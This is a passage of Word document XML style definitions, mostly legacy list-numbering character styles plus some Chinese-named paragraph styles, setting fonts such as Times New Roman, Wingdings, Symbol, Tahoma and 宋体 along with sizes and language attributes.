      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num89z1">
    <w:name w:val="WW8Num89z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num89z2">
    <w:name w:val="WW8Num89z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num89z3">
    <w:name w:val="WW8Num89z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num89z4">
    <w:name w:val="WW8Num89z4"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num90z0">
    <w:name w:val="WW8Num90z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num90z1">
    <w:name w:val="WW8Num90z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num90z2">
    <w:name w:val="WW8Num90z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num90z3">
    <w:name w:val="WW8Num90z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num90z4">
    <w:name w:val="WW8Num90z4"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num91z0">
    <w:name w:val="WW8Num91z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num91z1">
    <w:name w:val="WW8Num91z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num91z3">
    <w:name w:val="WW8Num91z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num92z1">
    <w:name w:val="WW8Num92z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num93z0">
    <w:name w:val="WW8Num93z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num93z1">
    <w:name w:val="WW8Num93z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num93z3">
    <w:name w:val="WW8Num93z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="23">
    <w:name w:val="默认段落字体2"/>
    <w:rsid w:val="00895A44"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num5z6">
    <w:name w:val="WW8Num5z6"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num7z6">
    <w:name w:val="WW8Num7z6"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Absatz-Standardschriftart">
    <w:name w:val="Absatz-Standardschriftart"/>
    <w:rsid w:val="00895A44"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num6z0">
    <w:name w:val="WW8Num6z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num10z0">
    <w:name w:val="WW8Num10z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num10z1">
    <w:name w:val="WW8Num10z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num10z2">
    <w:name w:val="WW8Num10z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num10z3">
    <w:name w:val="WW8Num10z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num12z1">
    <w:name w:val="WW8Num12z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num13z0">
    <w:name w:val="WW8Num13z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num13z1">
    <w:name w:val="WW8Num13z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      <w:color w:val="auto"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num13z2">
    <w:name w:val="WW8Num13z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num13z3">
    <w:name w:val="WW8Num13z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num13z4">
    <w:name w:val="WW8Num13z4"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num13z6">
    <w:name w:val="WW8Num13z6"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num15z0">
    <w:name w:val="WW8Num15z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num15z1">
    <w:name w:val="WW8Num15z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num15z2">
    <w:name w:val="WW8Num15z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num15z3">
    <w:name w:val="WW8Num15z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num15z4">
    <w:name w:val="WW8Num15z4"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num15z6">
    <w:name w:val="WW8Num15z6"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num17z0">
    <w:name w:val="WW8Num17z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num17z1">
    <w:name w:val="WW8Num17z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num17z3">
    <w:name w:val="WW8Num17z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num19z1">
    <w:name w:val="WW8Num19z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num28z3">
    <w:name w:val="WW8Num28z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num30z0">
    <w:name w:val="WW8Num30z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num30z1">
    <w:name w:val="WW8Num30z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num30z5">
    <w:name w:val="WW8Num30z5"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num34z1">
    <w:name w:val="WW8Num34z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num34z2">
    <w:name w:val="WW8Num34z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num34z3">
    <w:name w:val="WW8Num34z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num34z4">
    <w:name w:val="WW8Num34z4"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num35z0">
    <w:name w:val="WW8Num35z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num35z2">
    <w:name w:val="WW8Num35z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num42z3">
    <w:name w:val="WW8Num42z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num43z0">
    <w:name w:val="WW8Num43z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num43z1">
    <w:name w:val="WW8Num43z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num43z2">
    <w:name w:val="WW8Num43z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num43z3">
    <w:name w:val="WW8Num43z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num43z5">
    <w:name w:val="WW8Num43z5"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num45z1">
    <w:name w:val="WW8Num45z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num46z0">
    <w:name w:val="WW8Num46z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      <w:color w:val="auto"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num46z2">
    <w:name w:val="WW8Num46z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num46z3">
    <w:name w:val="WW8Num46z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num46z4">
    <w:name w:val="WW8Num46z4"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num47z3">
    <w:name w:val="WW8Num47z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num51z3">
    <w:name w:val="WW8Num51z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num52z0">
    <w:name w:val="WW8Num52z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num52z2">
    <w:name w:val="WW8Num52z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num54z2">
    <w:name w:val="WW8Num54z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      <w:color w:val="auto"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num57z0">
    <w:name w:val="WW8Num57z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num64z3">
    <w:name w:val="WW8Num64z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num65z3">
    <w:name w:val="WW8Num65z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num66z0">
    <w:name w:val="WW8Num66z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num66z1">
    <w:name w:val="WW8Num66z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num66z2">
    <w:name w:val="WW8Num66z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num66z3">
    <w:name w:val="WW8Num66z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num70z0">
    <w:name w:val="WW8Num70z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num70z1">
    <w:name w:val="WW8Num70z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num70z3">
    <w:name w:val="WW8Num70z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num70z5">
    <w:name w:val="WW8Num70z5"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num78z0">
    <w:name w:val="WW8Num78z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num78z1">
    <w:name w:val="WW8Num78z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num78z2">
    <w:name w:val="WW8Num78z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num78z3">
    <w:name w:val="WW8Num78z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num81z0">
    <w:name w:val="WW8Num81z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num84z2">
    <w:name w:val="WW8Num84z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="16">
    <w:name w:val="默认段落字体1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="en-US" w:eastAsia="ar-SA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CharChar">
    <w:name w:val="Char Char"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="ar-SA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="17">
    <w:name w:val="批注引用1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="en-US" w:eastAsia="ar-SA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="6TimesNewRomanChar">
    <w:name w:val="样式 标题 6 + (西文) Times New Roman (中文) 宋体 Char"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="1"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="ar-SA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="content1">
    <w:name w:val="content1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:lang w:val="en-US" w:eastAsia="ar-SA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="txt">
    <w:name w:val="txt"/>
    <w:basedOn w:val="16"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="en-US" w:eastAsia="ar-SA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="windy1">
    <w:name w:val="windy1"/>
    <w:basedOn w:val="16"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="en-US" w:eastAsia="ar-SA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fonttitle">
    <w:name w:val="font_title"/>
    <w:basedOn w:val="16"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="en-US" w:eastAsia="ar-SA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="18">
    <w:name w:val="正文缩进1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma"/>
      <w:kern w:val="1"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="en-US" w:eastAsia="ar-SA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CharChar0">
    <w:name w:val="标题 Char Char"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US" w:eastAsia="ar-SA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="AuthorChar">
    <w:name w:val="Author Char"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="en-US" w:eastAsia="ar-SA" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Heading">
    <w:name w:val="Heading"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="af8"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:keepNext/>
